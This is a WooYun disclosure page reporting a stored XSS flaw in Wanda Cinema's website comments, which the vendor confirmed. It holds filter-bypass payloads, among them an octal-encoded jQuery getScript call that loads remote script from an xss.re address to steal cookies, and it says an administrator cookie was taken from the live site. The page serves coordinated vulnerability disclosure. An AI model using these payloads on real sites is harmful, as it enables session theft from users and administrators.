当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-089130

漏洞标题:万达电影主站XSS漏洞(已经获取到管理员cookie)

相关厂商:大连万达集团股份有限公司

漏洞作者: roker

提交时间:2015-01-05 18:47

修复时间:2015-02-19 18:48

公开时间:2015-02-19 18:48

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-05: 细节已通知厂商并且等待厂商处理中
2015-01-05: 厂商已经确认,细节仅向厂商公开
2015-01-15: 细节向核心白帽子及相关领域专家公开
2015-01-25: 细节向普通白帽子公开
2015-02-04: 细节向实习白帽子公开
2015-02-19: 细节向公众公开

简要描述:

万达电影主站XSS漏洞(已经获取到管理员cookie)

详细说明:

主站评论处。
可以插入html标签,可以插入

<img src=x onerror=xx>

但是过滤了蛮多-。-
eval write document这些都过滤了。
但是姿势还是有的。例如

<img src="x" onerror="[].constructor.constructor('aler\164(1)')()">


1.jpg


2.jpg


alert
看到记载了jquery
那么我们插入这样的代码这样就好啦

<img src="x" onerror="$['\147\145\164S\143\162\151\160\164']('\150\164\164\160\72\57\57\170\163\163\56\162\145\57\66\70\71\66')">


加载远程js
可盗取用户 cookie~

x.png


过了一会发现管理员的也获取到了。。。

11.png


貌似特定ip才能打开。当然我们可以获取页面源代码来进行更深入的测试。。
可是过了一会儿管理就把评论给删了,那么就不进一步测试咯~。在修补前提交吧~~嘻嘻

漏洞证明:

11.png


修复方案:

修复啦~

版权声明:转载请注明来源 roker@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-01-05 23:34

厂商回复:

感谢roker同学的关注与贡献,立即通知业务整改。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-01-05 22:16 | 牛肉包子 ( 普通白帽子 | Rank:254 漏洞数:64 )

    前排顶爷爷

  2. 2015-01-06 21:37 | 阿布 ( 路人 | Rank:16 漏洞数:5 )

    roker 傻逼

  3. 2015-01-28 15:59 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    有点意思

  4. 2015-02-16 12:26 | 牛肉包子 ( 普通白帽子 | Rank:254 漏洞数:64 )

    给跪了,看不懂